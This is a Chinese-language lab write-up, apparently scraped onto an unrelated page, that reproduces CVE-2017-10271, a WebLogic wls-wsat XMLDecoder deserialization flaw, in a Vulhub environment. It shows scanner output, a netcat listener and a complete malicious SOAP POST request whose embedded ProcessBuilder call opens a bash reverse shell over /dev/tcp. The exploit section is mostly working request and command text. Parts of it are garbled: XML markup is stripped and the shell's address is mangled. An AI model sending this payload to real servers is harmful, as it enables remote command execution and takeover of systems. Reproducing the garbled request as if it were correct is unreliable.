国外网站欣赏建设购物网站要求

当前位置： 首页 > news >正文

国外网站欣赏,建设购物网站要求,专业网站建设需要多少钱,超链接友情外链查询感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描nacsweblogicScanner3、漏洞验证 说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic 10.3.… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描nacsweblogicScanner3、漏洞验证 说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞CVE-2017-10271漏洞评级高危影响范围10.3.6漏洞描述Weblogic的WLS Security组件对外提供webservice服务其中使用了XMLDecoder来解析用户传入的XML数据在解析的过程中出现反序列化漏洞导致可执行任意命令修复方案打补丁上设备升级组件 1.1、漏洞描述 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic的WLS Security组件对外提供webservice服务其中使用了XMLDecoder来解析用户传入的XML数据在解析的过程中出现反序列化漏洞导致可执行任意命令 1.2、漏洞等级 高危 1.3、影响版本 10.3.6 1.4、漏洞复现 1、基础环境 PathVulhub/weblogic/CVE-2017-10271 启动测试环境 sudo docker-compose up -d等待一段时间访问http://your-ip:7001/即可看到一个404页面说明weblogic已成功启动。 Weblogic的登陆地址是your-ip:7001/console 2、漏洞扫描 nacs 查看帮助信息 ./nacs -h ┌──(kali㉿kali)-[/tools/nacs/0.0.3] └─$ sudo ./nacs -h 192.168.80.141 -pa 7001_ _ ___ ___ ___
| | | / \ / _| / |
| . | | - | | ( _
||_| ||| _| |/ Version: 0.0.3 [05:55:53] [INFO] Start to probe alive machines [05:55:53] [] Target 192.168.80.141 is alive [05:55:53] [INFO] There are total of 1 hosts, and 1 are surviving [05:55:53] [WARNING] Too few surviving hosts [05:55:53] [INFO] Start to discover the ports [05:55:53] [*] [TCP/SSH] ssh://192.168.80.141:22 [SSH-2.0-OpenSSH_9.2p1\x20Debian-2] [05:55:59] [] [TCP/HTTP] [404] [JSP] [Servlet] [Weblogic] http://192.168.80.141:7001 [None] [05:55:59] [INFO] A total of 2 targets, the rule base hits 2 targets [05:55:59] [INFO] Start to send pocs to web services (xray type) [05:55:59] [INFO] Load 397 xray poc(s) [05:56:01] [] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2729-2 [05:56:02] [] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2725 v10 [05:56:12] [] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2017-10271 reverse [05:57:01] [INFO] Start to process nonweb services [05:57:01] [INFO] [protocol] ssh 192.168.80.141 [05:59:29] [INFO] Task finish, consumption of time: 3m35.385936144s weblogicScanner 项目地址https://github.com/0xn0ne/weblogicScanner ┌──(kali㉿kali)-[/tools/weblogic/weblogicScanner] └─$ python ws.py -t 192.168.80.141
[06:02:31][INFO] [-][CVE-2018-2894][192.168.80.141:7001] Not found. [06:02:33][INFO] [][CVE-2017-10271][192.168.80.141:7001] Exists vulnerability! [06:02:33][INFO] [][CVE-2014-4210][192.168.80.141:7001] Found module, Please verify manually! [06:02:38][INFO] [-][CVE-2019-2890][192.168.80.141:7001] Not vulnerability. [06:02:39][INFO] [-][CVE-2016-0638][192.168.80.141:7001] Not vulnerability. [06:02:39][INFO] [!][CVE-2018-3245][192.168.80.141:7001] Connection error. [06:02:39][INFO] [-][CVE-2018-3245][192.168.80.141:7001] Not vulnerability. [06:02:40][INFO] [-][CVE-2018-3191][192.168.80.141:7001] Not vulnerability. [06:02:40][INFO] [-][CVE-2020-2883][192.168.80.141:7001] Not vulnerability. [06:02:40][INFO] [-][CVE-2020-2555][192.168.80.141:7001] Not vulnerability. [06:02:42][INFO] [][CVE-2020-2551][192.168.80.141:7001] Found module, Please verify manually! [06:02:42][INFO] [][CVE-2019-2618][192.168.80.141:7001] Found module, Please verify manually! [06:02:43][INFO] [][CVE-2019-2725][192.168.80.141:7001] Exists vulnerability! [06:02:43][INFO] [][CVE-2018-3252][192.168.80.141:7001] Found module, Please verify manually! [06:02:43][INFO] [][CVE-2020-14750][192.168.80.141:7001] Exists vulnerability! [06:02:43][INFO] [][CVE-2019-2888][192.168.80.141:7001] Found module, Please verify manually! [06:02:44][INFO] [!][CVE-2020-14882][192.168.80.141:7001] Connection error. [06:02:44][INFO] [-][CVE-2020-14882][192.168.80.141:7001] Not vulnerability. [06:02:44][INFO] [][CVE-2019-2729][192.168.80.141:7001] Exists vulnerability! [06:02:45][INFO] [][CVE-2018-2893][192.168.80.141:7001] Exists vulnerability! [06:02:45][INFO] [][CVE-2017-3506][192.168.80.141:7001] Exists vulnerability! [06:02:46][INFO] [][CVE-2016-3510][192.168.80.141:7001] Exists vulnerability! [06:02:47][INFO] [][CVE-2017-3248][192.168.80.141:7001] Exists vulnerability! [06:02:48][INFO] [-][CVE-2018-2628][192.168.80.141:7001] Not vulnerability. [06:02:52][INFO] [-][Weblogic Console][192.168.80.141:7001] Not found. [06:02:52][INFO] [-][CVE-2020-14883][192.168.80.141:7001] Not vulnerability. Run completed, 27 seconds total. 3、漏洞验证 访问/wls-wsat/CoordinatorPortType页面 改变请求方式为post kali监听21端口 nc -lvp 21发送如下数据包注意其中反弹shell的语句需要进行编码否则解析XML的时候将出现格式错误 POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.80.141:7001 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,/;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Cookie: ADMINCONSOLESESSIONvq4hk23V21rs9yG5nGTvYkGppFGmFrvzzM2tvtw2pSnKQCsjPmvt!-1799840789 Connection: close Content-Type: text/xml Content-Length: 641soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ soapenv:Header work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ java version1.4.0 classjava.beans.XMLDecoder void classjava.lang.ProcessBuilder array classjava.lang.String length3 void index0 string/bin/bash/string /void void index1 string-c/string /void void index2 stringbash -i gt;amp; /dev/tcp/192.168.80.¹⁴¹⁄₂₁ 0gt;amp;1/string /void /array void methodstart//void /java /work:WorkContext /soapenv:Header soapenv:Body/ /soapenv:Envelope 成功获取shell